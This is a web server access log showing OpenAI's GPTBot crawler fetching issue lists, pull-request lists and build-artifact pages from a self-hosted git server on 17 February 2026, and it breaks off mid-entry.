"Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&project=-1&state=all&type=all" +[17/Feb/2026:18:19:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?labels=0&state=open&type=all" [Client 74.7.227.38] [Length 10139] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues" +[17/Feb/2026:18:19:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?labels=0&state=open&type=all" [Client 74.7.227.38] [Length 9962] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls" +[17/Feb/2026:18:19:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&milestone=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10185] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&milestone=-1&state=all&type=all" +[17/Feb/2026:18:19:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 9989] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&project=-1&state=all&type=all" +[17/Feb/2026:18:19:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/.Notebook/%EC%84%A4%EC%B9%98%ED%8C%A8%ED%82%A4%EC%A7%80%20%EC%B2%B4%ED%81%AC%20by%20claude.md?display=rendered" [Client 74.7.227.38] [Length 14281] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/.Notebook/%EC%84%A4%EC%B9%98%ED%8C%A8%ED%82%A4%EC%A7%80%20%EC%B2%B4%ED%81%AC%20by%20claude.md" +[17/Feb/2026:18:19:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&milestone=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10175] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&milestone=-1&state=all&type=all" +[17/Feb/2026:18:19:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&milestone=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10176] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&milestone=-1&state=all&type=all" +[17/Feb/2026:18:19:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?labels=0&state=closed&type=all" [Client 74.7.227.38] [Length 9982] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&state=all&type=all" +[17/Feb/2026:18:19:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal?display=source" [Client 74.7.227.38] [Length 16059] [Gzip 5.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" +[17/Feb/2026:18:19:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d?files=GoldPilot%2fdata_fetcher%2f__pycache__%2fnaver_fetcher.cpython-312.pyc" [Client 74.7.227.38] [Length 20828] [Gzip 3.74] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/__pycache__/naver_fetcher.cpython-312.pyc" +[17/Feb/2026:18:19:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&milestone=-1&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10203] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:19:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d?files=GoldPilot%2fdata_fetcher%2f__pycache__%2fapi_fetcher.cpython-312.pyc" [Client 74.7.227.38] [Length 20831] [Gzip 3.74] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/__pycache__/api_fetcher.cpython-312.pyc" +[17/Feb/2026:18:19:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&state=all&type=all" [Client 74.7.227.38] [Length 10120] [Gzip 3.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&state=all&type=all" +[17/Feb/2026:18:19:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&state=all&type=all" [Client 74.7.227.38] [Length 10117] [Gzip 3.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&state=all&type=all" +[17/Feb/2026:18:19:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10224] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?project=-1&state=closed&type=all" +[17/Feb/2026:18:19:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10031] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?project=-1&sort=mostcomment&state=all&type=all" +[17/Feb/2026:18:19:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10033] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?project=-1&state=closed&type=all" +[17/Feb/2026:18:19:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?milestone=-1&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10197] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:19:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/tsconfig.json?display=source" [Client 74.7.227.38] [Length 11902] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/tsconfig.json" +[17/Feb/2026:18:19:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles/rules.ninja?display=rendered" [Client 74.7.227.38] [Length 11049] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles/rules.ninja" +[17/Feb/2026:18:19:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles/rules.ninja?display=source" [Client 74.7.227.38] [Length 12957] [Gzip 3.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles/rules.ninja" +[17/Feb/2026:18:19:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/cpp/include/controller.hpp?display=rendered" [Client 74.7.227.38] [Length 11046] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/cpp/include/controller.hpp" +[17/Feb/2026:18:19:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeCache.txt?display=rendered" [Client 74.7.227.38] [Length 11056] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeCache.txt" +[17/Feb/2026:18:19:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&labels=0&state=open&type=all" [Client 74.7.227.38] [Length 10153] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&labels=0&state=all&type=all" +[17/Feb/2026:18:19:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&milestone=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10187] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&milestone=-1&state=all&type=all" +[17/Feb/2026:18:19:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10021] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&state=all&type=all" +[17/Feb/2026:18:19:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&labels=0&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10195] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&labels=0&state=all&type=all" +[17/Feb/2026:18:19:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10001] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&state=all&type=all" +[17/Feb/2026:18:19:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 9998] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=recentupdate&state=all&type=all" +[17/Feb/2026:18:19:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 9972] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=nearduedate&state=all&type=all" +[17/Feb/2026:18:19:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10175] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&state=all&type=all" +[17/Feb/2026:18:19:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10170] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&state=all&type=all" +[17/Feb/2026:18:19:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10168] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=leastcomment&state=all&type=all" +[17/Feb/2026:18:19:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10000] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=leastcomment&state=all&type=all" +[17/Feb/2026:18:19:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10000] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&state=all&type=all" +[17/Feb/2026:18:19:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10167] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=nearduedate&state=all&type=all" +[17/Feb/2026:18:19:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?milestone=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10009] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?sort=farduedate&state=open&type=all" +[17/Feb/2026:18:19:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10005] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?project=-1&state=open&type=all" +[17/Feb/2026:18:19:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10192] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?project=-1&state=open&type=all" +[17/Feb/2026:18:19:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/cpp/cmake_install.cmake?display=rendered" [Client 74.7.227.38] [Length 11045] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/cpp/cmake_install.cmake" +[17/Feb/2026:18:19:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/cpp/include/vendor_formats.hpp?display=rendered" [Client 74.7.227.38] [Length 11040] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" +[17/Feb/2026:18:19:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10166] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&state=all&type=all" +[17/Feb/2026:18:19:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 9999] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=leastcomment&state=all&type=all" +[17/Feb/2026:18:19:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 9997] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=recentupdate&state=all&type=all" +[17/Feb/2026:18:19:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10171] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&state=all&type=all" +[17/Feb/2026:18:19:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10171] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=farduedate&state=all&type=all" +[17/Feb/2026:18:19:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10001] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&state=all&type=all" +[17/Feb/2026:18:19:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 9998] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=mostcomment&state=all&type=all" +[17/Feb/2026:18:19:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10002] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&state=all&type=all" +[17/Feb/2026:18:19:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10167] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=recentupdate&state=all&type=all" +[17/Feb/2026:18:19:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10168] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=mostcomment&state=all&type=all" +[17/Feb/2026:18:19:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10164] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=mostcomment&state=all&type=all" +[17/Feb/2026:18:19:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10172] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&state=all&type=all" +[17/Feb/2026:18:19:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10211] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&state=closed&type=all" +[17/Feb/2026:18:19:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10207] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=recentupdate&state=closed&type=all" +[17/Feb/2026:18:19:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-.-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 11610] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/reply" +[17/Feb/2026:18:19:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10170] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=leastcomment&state=all&type=all" +[17/Feb/2026:18:19:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10168] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; 